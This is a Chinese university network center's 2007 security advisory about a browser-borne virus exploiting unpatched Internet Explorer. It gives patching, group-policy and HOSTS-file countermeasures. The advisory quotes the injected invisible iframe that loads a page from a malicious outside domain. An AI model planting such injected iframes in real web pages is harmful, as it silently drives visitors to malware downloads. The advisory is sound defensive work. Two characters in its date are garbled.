各校园网用户：
    近日发现浏览某些网站时，安全工具会提示发现病毒，同时网站的打开受到影响甚至根本不能访问。病毒会自动在所浏览页面的首行插入一个不可见框架，内容为： 
　　＜ｉｆｒａｍｅ　ｓｒｃ＝ｈｔｔｐ：／／ｆｒｅｅ．２０－０９．ｃｎ／ｅｒｒｏｒ．ｈｔｍ　ｗｉｄｔｈ＝１００　ｈｅｉｇｈｔ＝０＞＜／ｉｆｒａｍｅ＞。
    经查，相关服务器上是没有这些代码的。此病毒应当是利用IE浏览器的漏洞而通过网络传播的，类似当年的震荡波的感染原理。因此，当用户系统没有打全Windows安全补丁时，即会导致中毒情况的发生。此时浏览器会自动在用户临时目录下生成一个 Microsofts.bat的病毒文件（PE格式），并在Wscript.exe的支持下运行病毒脚本。
    紧急处理措施：
    1.立即打全Windows所有安全补丁。建议安装部署校内自动升级服务，速度极快。
    2.急需上网时，可临时换用Firefox或Opera之类的第三方浏览器，或者使用配置过自动过滤功能的Maxthon浏览器，可有效避免病毒的自动下载。这些第三方浏览器在工大网安可下载到（http://210.45.240.132/index.asp）
    3.利用组策略阻止这个病毒文件的运行。方法是：
    在开始菜单的“运行”中输入 Gpedit.msc ，回车运行；
    依次展开“本地计算机策略”→“计算机配置”→“Windows设置”→“安全设置”→“软件限制策略”→“其它规则”，右击，按提示新建规则，再右击选择“新路径规则”，在打开的对话框中的“路径”输入框中输入以下内容：
    %TEMP%\*.bat
    其他的不用管。确定后退出。这样可禁止临时目录下BAT类文件的执行。
    重复上述操作新建路径规则，输入：
    %SystemRoot%\System32\Wscript.exe
    可阻止脚本的执行。
    上述策略对一般应用没有任何影响。
    4.用记事本打开 Windows\System32\Drivers\ETC\HOSTS 这个文件，在尾部输入一行：
    0.0.0.0  free.20-09.cn
    可阻止打开病毒网站进一步下载病毒。也可在工大网安直接下载HOSTS免疫程序执行一次即可。

    最后强调一下：注意操作系统的安全补丁的升级是极其重要的，在防范漏洞利用方面，这比安装什么杀毒软件都管用！

                                       合肥工业大学网络中心网络安全与紧急响应组
                                                   二??七年九月三日